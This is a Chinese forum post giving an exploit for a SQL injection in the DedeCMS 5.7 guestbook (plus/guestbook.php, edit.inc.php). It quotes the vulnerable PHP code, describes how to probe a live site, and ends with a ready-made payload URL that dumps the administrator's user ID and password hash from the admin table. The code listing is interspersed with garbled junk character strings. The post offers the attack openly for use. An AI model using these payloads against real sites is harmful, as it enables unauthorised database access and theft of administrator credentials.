dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7
4 K/ z8 n7 K# m
漏洞文件edit.inc.php具体代码：

< ?php  
/ g1 @- N- W- r  k9 {& G' J
if(!defined('DEDEINC')) exit('Request Error!');  

   

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

- @& g) V: R; A# B$ Eelse $GUEST_BOOK_POS = "guestbook.php";  
( P0 s4 f% B% N5 h: s! M
) S7 {7 f* t; X7 ]  l% E4 W1 t   
2 l/ e7 S6 D& k( D$ j% ]$ \
$id = intval($id);  
9 v: d1 T, q6 h
if(empty($job)) $job='view';  

   

if($job=='del' && $g_isadmin)  
! B* p! v) E; p  ?
{  

+ [0 W$ x: e; w- W. r6 c$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

, @. e" ]# n$ P2 j( O) ]8 NShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

0 Y3 G  w- r$ c; M' w7 b9 a$ Cexit();  

% V: H8 R5 T' p; m7 I, R, A9 o}  
2 Z* v: e( j8 X* N
else if($job=='check' && $g_isadmin)  
+ ?# m3 I( O; H* }+ v
( \3 @: W$ I7 w" d6 Y* x! p{  

1 M8 S2 P& b# f3 r) c5 z# n( |8 }5 W$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  
# a0 @; M9 k& O% @8 I3 ^% g
" t4 N& R* {* j( q1 S" u6 Kexit();  

* A! t! M. k% V}  

+ V4 f( ?  T! g9 M/ V4 D  xelse if($job=='editok')  
( y* I2 n* o  Q! X  i9 _- g
5 \' K  h- D# v+ G) m; b/ Z9 E' l{  
0 i( b6 ]& C2 P+ T4 [
; X" H5 Y+ I/ S2 v$ x7 R4 ~: U/ C$remsg = trim($remsg);  

+ F; K/ p$ u# B6 c7 c& k3 X6 bif($remsg!='')  
5 u- P, I' y$ T8 r6 Q9 A
9 K& I5 L  s5 f) v& h{  
3 Y7 J- q* y% Y) _/ {, Y$ z6 E8 v
//管理员回复不过滤HTML By:Errorera blog:errs.cc  
& B* ?( Z) E; P+ q6 o6 ~$ `
if($g_isadmin)  
0 i/ a6 o4 ]$ E
' Q, X9 r* X0 q/ Y  g{  
3 P; f; B6 V1 X  h) ]
$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

8 w, `( f% C( p* J: G, ~' H5 L//$remsg <br /><font color=red>管理员回复：</font> }  
9 F8 [, u) w5 d$ w
9 N+ d7 R1 c/ `" D1 E; ]else

{  

$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  
6 s) c4 z4 b0 p' e  ^
$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
1 W. S9 I7 A/ [' X
& k9 S( m3 `7 w* I& a. f$msg = $oldmsg.$remsg;  

}  
; ?3 M2 L+ @3 t$ D3 K
}  

5 A* j) _* v8 c) h' ?//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
$ U/ I/ I$ L$ d: B# Q$ l
ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
: J& c- D& \7 z! c- H
4 Q- Y9 ]2 Q% {1 Xexit();  
1 {. n( w9 f! x0 J  m; b
* _* \/ a* J! `. c3 L$ v1 @6 b}  

//home:www.errs.cc  
, Z9 v* d4 f: Z# [. e
& g7 F& I& A+ G" i, Dif($g_isadmin)  

3 W* X+ _5 O$ i  f$ a{  

" `3 d; K) g- t& e$ E& H$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

3 b5 E% b1 }+ f# j6 ]require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

! p! J. f0 ?  V9 n( O}  
4 ~3 x/ A$ z- ^( [7 U- q
else

{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

0 j( N4 X0 v+ B, k5 |) R! r3 k0 y0 }require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

} 漏洞成功需要条件：
- e: q7 e' J( p% N. Q1 `1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
7 N, s' Q- C3 S, T. o
3 V& b& t% R" M4 N8 y+ z( r怎么判断是否存在漏洞：
: P/ W( K* k( y* J先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
% ~' F, H% u$ H访问：
/ \7 R# L# a1 X2 ^% @! S. p1 K
" m5 p! H9 s! u8 V; W+ A5 Wwww.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
' F- Y# K" l) S: y" y跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证

" j. D; g2 h4 _6 M1 p7 y' j% |
明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问

www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样，大家有兴趣的多研究下！！
* `) g# i, [* f/ e
最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='